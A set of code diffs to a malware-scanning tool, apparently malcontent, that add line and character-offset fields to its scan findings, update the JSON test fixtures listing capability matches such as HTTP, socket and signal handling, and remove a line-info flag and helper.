                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http",
@@ -1852,6 +2321,10 @@
                     "MatchStrings": [
                         "HTTP/2"
                     ],
+                    "StartingLine": 18762,
+                    "EndingLine": 87136,
+                    "StartingOffset": 498,
+                    "EndingOffset": 1386,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http2.yara#http2",
@@ -1864,6 +2337,10 @@
                         "application/octet-stream",
                         "Accept"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 62759,
+                    "EndingOffset": 570811,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary",
@@ -1875,6 +2352,10 @@
                     "MatchStrings": [
                         "Accept-Encoding"
                     ],
+                    "StartingLine": 18640,
+                    "EndingLine": 18640,
+                    "StartingOffset": 990,
+                    "EndingOffset": 1004,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept-encoding.yara#content_type",
@@ -1889,6 +2370,10 @@
                         "WWW-Authenticate",
                         "www-authenticate"
                     ],
+                    "StartingLine": 18648,
+                    "EndingLine": 18765,
+                    "StartingOffset": 896,
+                    "EndingOffset": 4223,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/auth.yara#http_auth",
@@ -1900,6 +2385,10 @@
                     "MatchStrings": [
                         "Content-Length: 0"
                     ],
+                    "StartingLine": 18664,
+                    "EndingLine": 18664,
+                    "StartingOffset": 722,
+                    "EndingOffset": 738,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length.yara#content_length_0",
@@ -1912,6 +2401,10 @@
                         "Cookie",
                         "HTTP"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 62327,
+                    "EndingOffset": 1138366,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie",
@@ -1927,6 +2420,10 @@
                         "POST",
                         "post"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 55907,
+                    "EndingOffset": 965664,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload",
@@ -1945,6 +2442,10 @@
                         "HTTP",
                         "POST"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 3821,
+                    "EndingOffset": 1247294,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post",
@@ -1956,6 +2457,10 @@
                     "MatchStrings": [
                         "Proxy-Authorization"
                     ],
+                    "StartingLine": 18666,
+                    "EndingLine": 18666,
+                    "StartingOffset": 38,
+                    "EndingOffset": 56,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#proxy_auth",
@@ -1970,6 +2475,10 @@
                         "HTTP/1.",
                         "Referer"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 3550,
+                    "EndingOffset": 634820,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request",
@@ -1981,6 +2490,10 @@
                     "MatchStrings": [
                         "invalid packet"
                     ],
+                    "StartingLine": 18707,
+                    "EndingLine": 18765,
+                    "StartingOffset": 3541,
+                    "EndingOffset": 2061,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip.yara#packets",
@@ -1992,6 +2505,10 @@
                     "MatchStrings": [
                         "host to transport"
                     ],
+                    "StartingLine": 18746,
+                    "EndingLine": 18746,
+                    "StartingOffset": 1033,
+                    "EndingOffset": 1049,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref",
@@ -2004,6 +2521,9 @@
                         "IsLinkLocalUnicast",
                         "IsSingleIP"
                     ],
+                    "StartingLine": 13569,
+                    "EndingLine": 119414,
+                    "EndingOffset": 214942,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#ip_go",
@@ -2015,6 +2535,10 @@
                     "MatchStrings": [
                         "LookupIP"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 11376,
+                    "EndingOffset": 1079396,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr",
@@ -2028,6 +2552,10 @@
                         "SOCKS5",
                         "socks5"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 689675,
+                    "EndingOffset": 591002,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/socks5.yara#socks5",
@@ -2039,6 +2567,9 @@
                     "MatchStrings": [
                         "LookupHost"
                     ],
+                    "StartingLine": 13331,
+                    "EndingLine": 119414,
+                    "EndingOffset": 208239,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#go_resolve",
@@ -2052,6 +2583,10 @@
                         "listen",
                         "accept"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 60279,
+                    "EndingOffset": 345784,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen",
@@ -2063,6 +2598,10 @@
                     "MatchStrings": [
                         "getsockname"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 93350,
+                    "EndingOffset": 86227,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname",
@@ -2075,6 +2614,10 @@
                     "MatchStrings": [
                         "getsockopt"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 93277,
+                    "EndingOffset": 86153,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-options-get.yara#getsockopt",
@@ -2086,6 +2629,10 @@
                     "MatchStrings": [
                         "SetsockoptInt"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 28385,
+                    "EndingOffset": 95225,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-options-set.yara#go_setsockopt_int",
@@ -2097,6 +2644,10 @@
                     "MatchStrings": [
                         "getpeername"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 93330,
+                    "EndingOffset": 86207,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername",
@@ -2110,6 +2661,10 @@
                         "recvfrom",
                         "recvmsg"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 93370,
+                    "EndingOffset": 86275,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg",
@@ -2123,6 +2678,10 @@
                         "sendmsg",
                         "sendto"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 93387,
+                    "EndingOffset": 86291,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg",
@@ -2135,6 +2694,10 @@
                     "MatchStrings": [
                         "dialTCP"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 4000,
+                    "EndingOffset": 211735,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/connect.yara#connect_tcp",
@@ -2146,6 +2709,10 @@
                     "MatchStrings": [
                         "SSH"
                     ],
+                    "StartingLine": 18627,
+                    "EndingLine": 87145,
+                    "StartingOffset": 1339,
+                    "EndingOffset": 744,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh",
@@ -2158,6 +2725,10 @@
                         "ReadFromUDP",
                         "listenUDP"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 2833,
+                    "EndingOffset": 212830,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-receive.yara#udp_listen",
@@ -2170,6 +2741,10 @@
                         "WriteMsgUDP",
                         "DialUDP"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 2846,
+                    "EndingOffset": 212463,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp/udp-send.yara#udp_send",
@@ -2191,6 +2766,10 @@
                         "https://pkg.go.dev/text/template",
                         "https://index.docker.io/v1/Path"
                     ],
+                    "StartingLine": 18579,
+                    "EndingLine": 20182,
+                    "StartingOffset": 806,
+                    "EndingOffset": 51,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url",
@@ -2202,6 +2781,10 @@
                     "MatchStrings": [
                         "urlencode"
                     ],
+                    "StartingLine": 18745,
+                    "EndingLine": 18745,
+                    "StartingOffset": 2983,
+                    "EndingOffset": 2991,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode",
@@ -2213,6 +2796,9 @@
                     "MatchStrings": [
                         "RequestURI"
                     ],
+                    "StartingLine": 13249,
+                    "EndingLine": 119414,
+                    "EndingOffset": 721990,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle",
@@ -2225,6 +2811,10 @@
                         "http.request",
                         "net/url"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 3838,
+                    "EndingOffset": 1210537,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls",
@@ -2236,6 +2826,10 @@
                     "MatchStrings": [
                         "Getenv"
                     ],
+                    "StartingLine": 13041,
+                    "EndingLine": 119414,
+                    "StartingOffset": 696,
+                    "EndingOffset": 660701,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#go_getenv",
@@ -2247,6 +2841,10 @@
                     "MatchStrings": [
                         "setenv"
                     ],
+                    "StartingLine": 18662,
+                    "EndingLine": 119414,
+                    "StartingOffset": 419,
+                    "EndingOffset": 1066455,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/set.yara#setenv_putenv",
@@ -2258,6 +2856,10 @@
                     "MatchStrings": [
                         "unsetenv"
                     ],
+                    "StartingLine": 18674,
+                    "EndingLine": 119414,
+                    "StartingOffset": 883,
+                    "EndingOffset": 1066477,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/unset.yara#unsetenv",
@@ -2269,6 +2871,10 @@
                     "MatchStrings": [
                         "_close"
                     ],
+                    "StartingLine": 18664,
+                    "EndingLine": 27092,
+                    "StartingOffset": 696,
+                    "EndingOffset": 67909,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/access.yara#_close",
@@ -2280,6 +2886,10 @@
                     "MatchStrings": [
                         "fcntl"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 37310,
+                    "EndingOffset": 85699,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/manipulate.yara#fcntl",
@@ -2291,6 +2901,10 @@
                     "MatchStrings": [
                         "pread"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 56703,
+                    "EndingOffset": 85958,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#fd_read",
@@ -2303,6 +2917,10 @@
                         "syscall.Sendfile",
                         "sendfile"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 93146,
+                    "EndingOffset": 86020,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile",
@@ -2315,6 +2933,10 @@
                     "MatchStrings": [
                         "pwrite"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 60463,
+                    "EndingOffset": 85973,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#fd_write",
@@ -2326,6 +2948,10 @@
                     "MatchStrings": [
                         "netlink"
                     ],
+                    "StartingLine": 27092,
+                    "EndingLine": 27092,
+                    "StartingOffset": 13159,
+                    "EndingOffset": 13165,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink",
@@ -2338,6 +2964,10 @@
                         "sysctl",
                         "Sysctl"
                     ],
+                    "StartingLine": 14084,
+                    "EndingLine": 18620,
+                    "StartingOffset": 5579,
+                    "EndingOffset": 431,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/sysctl.yara#sysctl",
@@ -2349,6 +2979,9 @@
                     "MatchStrings": [
                         "sigaction"
                     ],
+                    "StartingLine": 18647,
+                    "EndingLine": 119414,
+                    "EndingOffset": 1170308,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/handle.yara#libc",
@@ -2361,6 +2994,10 @@
                         "sigaction",
                         "ALRM"
                     ],
+                    "StartingLine": 18558,
+                    "EndingLine": 119414,
+                    "StartingOffset": 434,
+                    "EndingOffset": 1170308,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/handle-ALRM.yara#sigaction_ALRM",
@@ -2373,6 +3010,10 @@
                         "sigaction",
                         "HUP"
                     ],
+                    "StartingLine": 18545,
+                    "EndingLine": 119414,
+                    "StartingOffset": 555,
+                    "EndingOffset": 1170308,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/handle-HUP.yara#sigaction_SIGHUP",
@@ -2385,6 +3026,9 @@
                         "sigaction",
                         "SIGINT"
                     ],
+                    "StartingLine": 18647,
+                    "EndingLine": 119414,
+                    "EndingOffset": 1170308,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/handle-INT.yara#sigaction_SIGINT",
@@ -2397,6 +3041,10 @@
                         "sigaction",
                         "QUIT"
                     ],
+                    "StartingLine": 18558,
+                    "EndingLine": 119414,
+                    "StartingOffset": 446,
+                    "EndingOffset": 1170308,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/handle-QUIT.yara#sigaction_SIGQUIT",
@@ -2409,6 +3057,9 @@
                         "sigaction",
                         "WINCH"
                     ],
+                    "StartingLine": 18647,
+                    "EndingLine": 119414,
+                    "EndingOffset": 1170308,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/handle-WINCH.yara#sigaction_WINCH",
@@ -2420,6 +3071,10 @@
                     "MatchStrings": [
                         "sigprocmask"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 37077,
+                    "EndingOffset": 60508,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/mask.yara#sigprocmask",
@@ -2431,6 +3086,10 @@
                     "MatchStrings": [
                         "syscall.Kill"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 92865,
+                    "EndingOffset": 85743,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/signal/send.yara#kill",
@@ -2442,6 +3101,10 @@
                     "MatchStrings": [
                         "ctime"
                     ],
+                    "StartingLine": 18641,
+                    "EndingLine": 18641,
+                    "StartingOffset": 1622,
+                    "EndingOffset": 1626,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/time/clock-convert.yara#bsd_time_conversion",
@@ -2453,6 +3116,10 @@
                     "MatchStrings": [
                         "adjtimex"
                     ],
+                    "StartingLine": 18628,
+                    "EndingLine": 18628,
+                    "StartingOffset": 356,
+                    "EndingOffset": 363,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/os/time/clock-set.yara#linux_adjtimex",
@@ -2464,6 +3131,10 @@
                     "MatchStrings": [
                         "crontab"
                     ],
+                    "StartingLine": 18648,
+                    "EndingLine": 18648,
+                    "StartingOffset": 121,
+                    "EndingOffset": 127,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/tab.yara#crontab_support",
@@ -2475,6 +3146,10 @@
                     "MatchStrings": [
                         "cd u"
                     ],
+                    "StartingLine": 92606,
+                    "EndingLine": 92606,
+                    "StartingOffset": 555,
+                    "EndingOffset": 558,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell",
@@ -2486,6 +3161,10 @@
                     "MatchStrings": [
                         "chroot"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 21724,
+                    "EndingOffset": 1245164,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot",
@@ -2497,6 +3176,10 @@
                     "MatchStrings": [
                         "clone"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 59118,
+                    "EndingOffset": 601306,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/create.yara#syscall_clone",
@@ -2509,6 +3192,10 @@
                     "MatchStrings": [
                         "setsid"
                     ],
+                    "StartingLine": 18640,
+                    "EndingLine": 18640,
+                    "StartingOffset": 444,
+                    "EndingOffset": 449,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/group/create.yara#syscalls",
@@ -2521,6 +3208,10 @@
                     "MatchStrings": [
                         "setgroups"
                     ],
+                    "StartingLine": 18680,
+                    "EndingLine": 18680,
+                    "StartingOffset": 725,
+                    "EndingOffset": 733,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups",
@@ -2532,6 +3223,10 @@
                     "MatchStrings": [
                         "setrlimit"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 92071,
+                    "EndingOffset": 84924,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/limit-set.yara#setrlimit",
@@ -2543,6 +3238,10 @@
                     "MatchStrings": [
                         "renice"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 18640,
+                    "StartingOffset": 55709,
+                    "EndingOffset": 389,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/setpriority.yara#nice",
@@ -2554,6 +3253,10 @@
                     "MatchStrings": [
                         "unshare"
                     ],
+                    "StartingLine": 18648,
+                    "EndingLine": 18648,
+                    "StartingOffset": 425,
+                    "EndingOffset": 431,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare",
@@ -2566,6 +3269,10 @@
                         "ontain alphanumerical characters onlyexplicitly tagged !!",
                         "does not work!!!"
                     ],
+                    "StartingLine": 18776,
+                    "EndingLine": 19823,
+                    "StartingOffset": 557,
+                    "EndingOffset": 68,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations",

--- a/pkg/action/testdata/scan_oci
+++ b/pkg/action/testdata/scan_oci
@@ -10,6 +10,9 @@
                     "MatchStrings": [
                         "umask"
                     ],
+                    "StartingLine": 23,
+                    "EndingLine": 23,
+                    "EndingOffset": 4,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-permission-mask-set.yara#umask",
@@ -21,6 +24,10 @@
                     "MatchStrings": [
                         "/etc/profile.d/"
                     ],
+                    "StartingLine": 28,
+                    "EndingLine": 28,
+                    "StartingOffset": 14,
+                    "EndingOffset": 28,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path",
@@ -32,6 +39,10 @@
                     "MatchStrings": [
                         "/usr/local/bin"
                     ],
+                    "StartingLine": 14,
+                    "EndingLine": 14,
+                    "StartingOffset": 13,
+                    "EndingOffset": 26,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-local.yara#usr_local_bin_path",
@@ -43,6 +54,10 @@
                     "MatchStrings": [
                         "/etc/profile"
                     ],
+                    "StartingLine": 28,
+                    "EndingLine": 28,
+                    "StartingOffset": 14,
+                    "EndingOffset": 25,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/shell/bash.yara#bash_persist",
@@ -54,6 +69,10 @@
                     "MatchStrings": [
                         "/etc/profile"
                     ],
+                    "StartingLine": 28,
+                    "EndingLine": 28,
+                    "StartingOffset": 14,
+                    "EndingOffset": 25,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/shell/init_files.yara#etc_shell_init_references",

--- a/pkg/malcontent/malcontent.go
+++ b/pkg/malcontent/malcontent.go
@@ -31,6 +31,7 @@ type Config struct {
 	IgnoreSelf            bool
 	IgnoreTags            []string
 	IncludeDataFiles      bool
+	LineInfo              bool
 	MinFileRisk           int
 	MinRisk               int
 	OCI                   bool
@@ -50,8 +51,12 @@ type Behavior struct {
 	Description string `json:",omitempty" yaml:",omitempty"`
 	// MatchStrings are all strings found relating to this behavior
 	MatchStrings []string `json:",omitempty" yaml:",omitempty"`
-	RiskScore    int
-	RiskLevel    string `json:",omitempty" yaml:",omitempty"`
+	// LineNumbers are the starting line numbers where matches occur (when --line-info is used)
+	LineNumbers []int `json:",omitempty" yaml:",omitempty"`
+	// CharOffsets are the character offsets within each line where matches occur (when --line-info is used)
+	CharOffsets []int `json:",omitempty" yaml:",omitempty"`
+	RiskScore   int
+	RiskLevel   string `json:",omitempty" yaml:",omitempty"`
 
 	RuleURL      string `json:",omitempty" yaml:",omitempty"`
 	ReferenceURL string `json:",omitempty" yaml:",omitempty"`

--- a/pkg/malcontent/malcontent.go
+++ b/pkg/malcontent/malcontent.go
@@ -51,12 +51,16 @@ type Behavior struct {
 	Description string `json:",omitempty" yaml:",omitempty"`
 	// MatchStrings are all strings found relating to this behavior
 	MatchStrings []string `json:",omitempty" yaml:",omitempty"`
-	// LineNumbers are the starting line numbers where matches occur (when --line-info is used)
-	LineNumbers []int `json:",omitempty" yaml:",omitempty"`
-	// CharOffsets are the character offsets within each line where matches occur (when --line-info is used)
-	CharOffsets []int `json:",omitempty" yaml:",omitempty"`
-	RiskScore   int
-	RiskLevel   string `json:",omitempty" yaml:",omitempty"`
+	// StartingLine is the line number where the match starts (when --line-info is used)
+	StartingLine int `json:",omitempty" yaml:",omitempty"`
+	// EndingLine is the line number where the match ends (when --line-info is used)
+	EndingLine int `json:",omitempty" yaml:",omitempty"`
+	// StartingOffset is the character offset on the starting line where the match begins (when --line-info is used)
+	StartingOffset int `json:",omitempty" yaml:",omitempty"`
+	// EndingOffset is the character offset on the ending line where the match ends (when --line-info is used)
+	EndingOffset int `json:",omitempty" yaml:",omitempty"`
+	RiskScore    int
+	RiskLevel    string `json:",omitempty" yaml:",omitempty"`
 
 	RuleURL      string `json:",omitempty" yaml:",omitempty"`
 	ReferenceURL string `json:",omitempty" yaml:",omitempty"`

--- a/pkg/malcontent/malcontent.go
+++ b/pkg/malcontent/malcontent.go
@@ -31,7 +31,6 @@ type Config struct {
 	IgnoreSelf            bool
 	IgnoreTags            []string
 	IncludeDataFiles      bool
-	LineInfo              bool
 	MinFileRisk           int
 	MinRisk               int
 	OCI                   bool
@@ -51,13 +50,13 @@ type Behavior struct {
 	Description string `json:",omitempty" yaml:",omitempty"`
 	// MatchStrings are all strings found relating to this behavior
 	MatchStrings []string `json:",omitempty" yaml:",omitempty"`
-	// StartingLine is the line number where the match starts (when --line-info is used)
+	// StartingLine is the line number where the match starts
 	StartingLine int `json:",omitempty" yaml:",omitempty"`
-	// EndingLine is the line number where the match ends (when --line-info is used)
+	// EndingLine is the line number where the match ends
 	EndingLine int `json:",omitempty" yaml:",omitempty"`
-	// StartingOffset is the character offset on the starting line where the match begins (when --line-info is used)
+	// StartingOffset is the character offset on the starting line where the match begins
 	StartingOffset int `json:",omitempty" yaml:",omitempty"`
-	// EndingOffset is the character offset on the ending line where the match ends (when --line-info is used)
+	// EndingOffset is the character offset on the ending line where the match ends
 	EndingOffset int `json:",omitempty" yaml:",omitempty"`
 	RiskScore    int
 	RiskLevel    string `json:",omitempty" yaml:",omitempty"`

--- a/pkg/render/json.go
+++ b/pkg/render/json.go
@@ -54,11 +54,6 @@ func (r JSON) Full(ctx context.Context, c *malcontent.Config, rep *malcontent.Re
 					r.ArchiveRoot = ""
 					r.FullPath = ""
 
-					// If line info is enabled, split behaviors with multiple line numbers
-					if c != nil && c.LineInfo {
-						r = splitBehaviorsByLineNumbers(r)
-					}
-
 					jr.Files[path] = r
 				}
 			}
@@ -76,71 +71,4 @@ func (r JSON) Full(ctx context.Context, c *malcontent.Config, rep *malcontent.Re
 	}
 	_, err = fmt.Fprintf(r.w, "%s\n", j)
 	return err
-}
-
-// splitBehaviorsByLineNumbers creates multiple behavior instances when a behavior has multiple line numbers.
-// Each resulting behavior will have exactly one line number.
-func splitBehaviorsByLineNumbers(fr *malcontent.FileReport) *malcontent.FileReport {
-	// Create a copy of the FileReport to avoid modifying the original
-	newFR := &malcontent.FileReport{
-		Path:                 fr.Path,
-		SHA256:               fr.SHA256,
-		Size:                 fr.Size,
-		Skipped:              fr.Skipped,
-		Meta:                 fr.Meta,
-		Syscalls:             fr.Syscalls,
